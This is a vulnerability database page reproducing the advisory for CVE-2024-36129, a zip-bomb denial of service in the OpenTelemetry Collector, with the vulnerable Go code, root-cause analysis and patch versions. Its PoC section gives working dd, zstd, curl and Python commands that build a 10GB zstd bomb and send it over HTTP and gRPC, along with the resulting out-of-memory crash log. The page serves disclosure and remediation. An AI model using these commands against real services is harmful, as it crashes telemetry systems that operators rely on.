8.2

CVSS Score

3.1

Basic Information

CVE ID

CVE-2024-36129

GHSA ID

GHSA-c74f-6mfw-mm4v

EPSS Score

0.71236%

CWE

CWE-119

Published

6/5/2024

Updated

6/17/2024

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2024-36129

CVE-2024-36129:
Denial of Service via Zip/Decompression Bomb sent over HTTP or gRPC

Summary

An unsafe decompression vulnerability allows unauthenticated attackers to crash the collector via excessive memory consumption.

Details

The OpenTelemetry Collector handles compressed HTTP requests by recognizing the Content-Encoding header, rewriting the HTTP request body, and allowing subsequent handlers to process decompressed data. It supports the gzip, zstd, zlib, snappy, and deflate compression algorithms. A "zip bomb" or "decompression bomb" is a malicious archive designed to crash or disable the system reading it. Decompression of HTTP requests is typically not enabled by default in popular server solutions due to associated security risks. A malicious attacker could leverage this weakness to crash the collector by sending a small request that, when uncompressed by the server, results in excessive memory consumption.

During proof-of-concept (PoC) testing, all supported compression algorithms could be abused, with zstd causing the most significant impact. Compressing 10GB of all-zero data reduced it to 329KB. Sending an HTTP request with this compressed data instantly consumed all available server memory (the testing server had 32GB), leading to an out-of-memory (OOM) kill of the collector application instance.

The root cause for this issue can be found in the following code path:

Affected File: https://github.com/open-telemetry/opentelemetry-collector/[...]confighttp/compression.go

Affected Code:

// httpContentDecompressor offloads the task of handling compressed HTTP requests
// by identifying the compression format in the "Content-Encoding" header and re-writing
// request body so that the handlers further in the chain can work on decompressed data.
// It supports gzip and deflate/zlib compression.
func httpContentDecompressor(h http.Handler, eh func(w http.ResponseWriter, r *http.Request, errorMsg string, statusCode int), decoders map[string]func(body io.ReadCloser) (io.ReadCloser, error)) http.Handler {
    [...]
    d := &decompressor{
        errHandler: errHandler,
        base:   	h,
        decoders: map[string]func(body io.ReadCloser) (io.ReadCloser, error){
            "": func(io.ReadCloser) (io.ReadCloser, error) {
                // Not a compressed payload. Nothing to do.
                return nil, nil
            },
            [...]
            "zstd": func(body io.ReadCloser) (io.ReadCloser, error) {
                zr, err := zstd.NewReader(
                    body,
                    zstd.WithDecoderConcurrency(1),
                )
                if err != nil {
                    return nil, err
                }
                return zr.IOReadCloser(), nil
            },
    [...]
}

func (d *decompressor) ServeHTTP(w http.ResponseWriter, r *http.Request) {
    newBody, err := d.newBodyReader(r)
    if err != nil {
        d.errHandler(w, r, err.Error(), http.StatusBadRequest)
        return
    }
    [...]
    d.base.ServeHTTP(w, r)
}

func (d *decompressor) newBodyReader(r *http.Request) (io.ReadCloser, error) {
    encoding := r.Header.Get(headerContentEncoding)
    decoder, ok := d.decoders[encoding]
    if !ok {
        return nil, fmt.Errorf("unsupported %s: %s", headerContentEncoding, encoding)
    }
    return decoder(r.Body)
}

To mitigate this attack vector, it is recommended to either disable support for decompressing client HTTP requests entirely or limit the size of the decompressed data that can be processed. Limiting the decompressed data size can be achieved by wrapping the decompressed data reader inside an io.LimitedReader, which restricts the reading to a specified number of bytes. This approach helps prevent excessive memory usage and potential out-of-memory errors caused by decompression bombs.

PoC

This issue was confirmed as follows:

PoC Commands:

dd if=/dev/zero bs=1G count=10 | zstd > poc.zst
curl -vv "http://192.168.0.107:4318/v1/traces" -H "Content-Type: application/x-protobuf" -H "Content-Encoding: zstd" --data-binary @poc.zst

Output:

10+0 records in
10+0 records out
10737418240 bytes (11 GB, 10 GiB) copied, 12,207 s, 880 MB/s

* processing: http://192.168.0.107:4318/v1/traces
*   Trying 192.168.0.107:4318...
* Connected to 192.168.0.107 (192.168.0.107) port 4318
> POST /v1/traces HTTP/1.1
> Host: 192.168.0.107:4318
> User-Agent: curl/8.2.1
> Accept: */*
> Content-Type: application/x-protobuf
> Content-Encoding: zstd
> Content-Length: 336655
>
* We are completely uploaded and fine
* Recv failure: Connection reset by peer
* Closing connection
curl: (56) Recv failure: Connection reset by peer

Server logs:

otel-collector-1  | 2024-05-30T18:36:14.376Z    info    service@v0.101.0/service.go:102    Setting up own telemetry...
[...]
otel-collector-1  | 2024-05-30T18:36:14.385Z    info    otlpreceiver@v0.101.0/otlp.go:152    Starting HTTP server    {"kind": "receiver", "name": "otlp", "data_type": "traces", "endpoint": "0.0.0.0:4318"}
otel-collector-1  | 2024-05-30T18:36:14.385Z    info    service@v0.101.0/service.go:195    Everything is ready. Begin running and processing data.
otel-collector-1  | 2024-05-30T18:36:14.385Z    warn    localhostgate/featuregate.go:63    The default endpoints for all servers in components will change to use localhost instead of 0.0.0.0 in a future version. Use the feature gate to preview the new default.    {"feature gate ID": "component.UseLocalHostAsDefaultHost"}
otel-collector-1 exited with code 137

A similar problem exists for configgrpc when using the zstd compression:

dd if=/dev/zero bs=1G count=10 | zstd > poc.zst
python3 -c 'import os, struct; f = open("/tmp/body.raw", "w+b"); f.write(b"\x01"); f.write(struct.pack(">L", os.path.getsize("poc.zst"))); f.write(open("poc.zst", "rb").read())'
curl -vv http://127.0.0.1:4317/opentelemetry.proto.collector.trace.v1.TraceService/Export --http2-prior-knowledge -H "content-type: application/grpc" -H "grpc-encoding: zstd" --data-binary @/tmp/body.raw

Impact

Unauthenticated attackers can crash the collector via excessive memory consumption, stopping the entire collection of telemetry.

Patches

The confighttp module version 0.102.0 contains a fix for this problem.
The configgrpc module version 0.102.1 contains a fix for this problem.
All official OTel Collector distributions starting with v0.102.1 contain both fixes.

Workarounds

None.

References

https://github.com/open-telemetry/opentelemetry-collector/pull/10289
https://github.com/open-telemetry/opentelemetry-collector/pull/10323
https://opentelemetry.io/blog/2024/cve-2024-36129/

Credits

This issue was uncovered during a security audit performed by 7ASecurity, facilitated by OSTIF, for the OpenTelemetry project.

(GitHub Advisory)

8.2

CVSS Score

3.1

Basic Information

CVE ID

CVE-2024-36129

GHSA ID

GHSA-c74f-6mfw-mm4v

EPSS Score

0.71236%

CWE

CWE-119

Published

6/5/2024

Updated

6/17/2024

KEV Status

Technology

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
go.opentelemetry.io/collector/config/confighttp	go	< 0.102.0	0.102.0
go.opentelemetry.io/collector/config/configgrpc	go	< 0.102.1	0.102.1

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability is a denial of service caused by unsafe decompression of HTTP and gRPC requests, commonly known as a 'zip bomb' or 'decompression bomb'.

For HTTP (handled by go.opentelemetry.io/collector/config/confighttp):

httpContentDecompressor: This function sets up the available decoders (like zstd, gzip) as anonymous functions. These anonymous functions, as detailed in the vulnerability description for zstd, directly use decompression libraries (e.g., zstd.NewReader) without limiting the output size. This is the root of the vulnerability for HTTP.
(*decompressor).newBodyReader: This method is called for each request to get the appropriate decoder (one of the anonymous functions from httpContentDecompressor) and applies it to the request body, returning an io.ReadCloser for the decompressed stream. It directly invokes the vulnerable decompression step.
(*decompressor).ServeHTTP: This method takes the decompressed stream from newBodyReader. Before the patch, it assigned this stream (which could be excessively large) to the request body without any size checks, leading to OOM when the body was later processed. The patch (commit 6e5f4142b80659b02fb4b72e476ef0c6848787cf) mitigates this by wrapping the stream with http.MaxBytesReader.

For gRPC (handled by go.opentelemetry.io/collector/config/configgrpc): The vulnerability description states a similar problem exists for gRPC with zstd compression. The PoC targets the TraceService/Export method. Before the fix (PR #10323), the collector's gRPC server used an external zstd decompression library (github.com/mostynb/go-grpc-compression/nonclobbering/zstd) that, in the context of the collector, did not adequately limit the size of the decompressed data. The fix involved replacing this with a custom internal zstd decompressor that respects size limits.

(*otlpReceiver).ExportTraces (and ExportMetrics, ExportLogs): These are the application-level gRPC service methods in the OTLP receiver. When a zstd-compressed request is sent to these endpoints, the gRPC framework invokes the registered zstd decompressor. If this decompressor is vulnerable (as it was pre-patch), an OOM can occur during the request processing leading up to or during the execution of these methods. These functions would appear in a runtime profile when the vulnerability is triggered via gRPC.

The identified functions are those directly involved in the decompression process (for HTTP) or are the gRPC endpoint handlers that would be targeted by a malicious compressed gRPC request, leading to the vulnerable decompression path being taken within the gRPC framework.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Summ*ry *n uns*** ***ompr*ssion vuln*r**ility *llows un*ut**nti**t** *tt**k*rs to *r*s* t** *oll**tor vi* *x**ssiv* m*mory *onsumption. ### **t*ils T** Op*nT*l*m*try *oll**tor **n*l*s *ompr*ss** *TTP r*qu*sts *y r**o*nizin* t** *ont*nt-*n*o*in*

Reasoning

T** vuln*r**ility is * **ni*l o* s*rvi** **us** *y uns*** ***ompr*ssion o* *TTP *n* *RP* r*qu*sts, *ommonly known *s * 'zip *om*' or '***ompr*ssion *om*'. *or *TTP (**n*l** *y `*o.op*nt*l*m*try.io/*oll**tor/*on*i*/*on*i**ttp`): *. `*ttp*ont*nt***om

8.2

Basic Information

Concerned about an active attack path?

CVE-2024-36129: Denial of Service via Zip/Decompression Bomb sent over HTTP or gRPC

Summary

Details

PoC

Impact

Patches

Workarounds

References

Credits

8.2

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

CVE-2024-36129:
Denial of Service via Zip/Decompression Bomb sent over HTTP or gRPC

Vulnerability Intelligence
Miggo AI